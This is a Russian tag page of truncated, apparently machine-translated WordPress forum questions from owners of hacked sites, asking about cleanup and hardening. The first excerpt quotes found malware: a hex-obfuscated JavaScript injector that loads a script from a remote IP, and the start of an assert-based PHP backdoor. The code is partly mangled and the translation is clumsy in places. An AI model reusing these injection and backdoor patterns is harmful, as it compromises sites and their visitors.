Articles of взломан

Как найти бэкдор взлома

Сегодня был взломан один из сайтов WordPress наших клиентов, который размещен с amazon aws ubuntu. Проблема: https://blog.sucuri.net/2016/01/jquery-pastebin-replacement.html Код js вводится во все js var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae85](_0xaae84[_0xaae83](_0xaae80)[_0xaae82]()[_0xaae81](_0xaae80)) и в index.php //###====### @error_reporting(E_ALL); @ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("display_errors", 0); @error_reporting(0); $wa = ASSERT_WARNING; @assert_options(ASSERT_ACTIVE, 1); @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = […]

Не удается получить доступ к htaccess

у моего htaccess есть chmod 444, и для меня это невозможно для администратора с доступом к ftp для его редактирования. Также, если я отключу все плагины безопасности wp. Когда я меняю chmod на 644, или если я просто удалю файл и создаю новый, возможно, его можно будет отредактировать на короткое время. Но через некоторое время […]

Сайт взломан вредоносной программой

Проверка сайта Sucuri говорит мне, что мой сайт заражен вредоносным ПО. ИЗБРАННОЕ ОПРЕДЕЛЕННОЕ ОПРЕДЕЛЕНИЕ ИНФЕКЦИОННЫЙ URL SEO Спам MW: СПАМ: SEO? http://mywebsite/about/ (Посмотреть http://mywebsite/about/ ) SEO Spam MW: СПАМ: SEO? http://mywebsite/2013/bad-times-for-home-owners/ (Посмотреть http://mywebsite/2013/bad-times-for-home-owners/ ) SEO Spam MW: СПАМ: SEO? http://mywebsite.com (Посмотреть http://mywebsite/2013/bad-times-for-home-owners/ ) Screaming Frog сообщает мне, что mywebsite.com/about постоянно перемещается (301) Любая идея, как […]

Сервер взломан: правильное содержимое каталога wp-uploads?

Наш сервер WordPress начал работать очень медленно, хотя загрузка на самом сервере была крайне низкой (<1%). Страница wp-admin не будет отвечать вообще. После расследования, было обнаружено, что сервер был взломан и был полон порно файлов. Мы пытаемся перестроить его, бит не имеет резервной копии. Кажется, что есть много этих файлов в каталоге wp-uploads. Помимо обычных […]

Эффективный способ проверки локальных PHP-файлов WordPress и базы данных для вредоносного кода?

Прежде всего, я не суперпользователь WP. Недавно мой друг был взломан, взломан, я имею в виду, что он не обновлял свой WP в течение длительного времени и вводил вредоносный код, который отправил спам, поэтому его хозяин заблокировал его. У него есть только зараженные файлы, которые уже были проверены и очищены разработчиком … вручную. Теперь я […]

Я удалил вредоносное ПО с нашего сайта, однако, когда я снова попытался найти слово из Google, он все еще там

Я не уверен, что это правильная страница. Но если нет, переадресовывайте правильную страницу. Я удалил вредоносное ПО с нашего сайта, однако, когда я снова попытался найти слово из Google, он все еще там. Пожалуйста, предоставьте помощь в этом или какие необходимые шаги я должен предпринять. Спасибо, Мелисса

Является ли текущий поток хаков связан с недавним исправлением безопасности?

На прошлой неделе была сыпь хаков. В каждом случае содержание сообщения было отредактировано либо инфантильным «взломанным», либо политическим сообщением. Это сообщение https://codex.wordpress.org/Version_4.7.2 относится к версиям 4.7.0 и 4.7.1, подверженным уязвимости уязвимости, не прошедшей проверку подлинности, в конечной точке API REST Используют ли вандалы эту уязвимость в устаревших установках WP или это другая проблема? Я хочу […]

Подозрительные URL-адреса загружаются после взлома и восстановления

У меня был сайт, который был взломан (имел арабские слова на index.php), и все файлы были удалены, но база данных все еще там. Я использовал Fantastico для установки чистой версии WP 3.1, и я все же кое-что подозрительно. В нижней правой части Firefox говорится: «Прочтите www.clickcoupon.me». С FireBug и PageSpeed ​​я вижу, что это открытие: […]

Предотвращение взлома сайта WordPress

Мой сайт WordPress – это отбор, взломанный некоторыми хакерами Саудовской Аравии. Как я могу помешать им взломать. Я также обнаружил, что многие другие сайты WordPress также были взломаны.

Это хорошая идея переименовать «index.php» в папку «wp-admin», чтобы избежать взлома?

Мой wordpress был взломан на 2 или 3 раза. Как я могу увеличить свою безопасность? Это хороший способ переименовать index.php в каталог wp-admin ?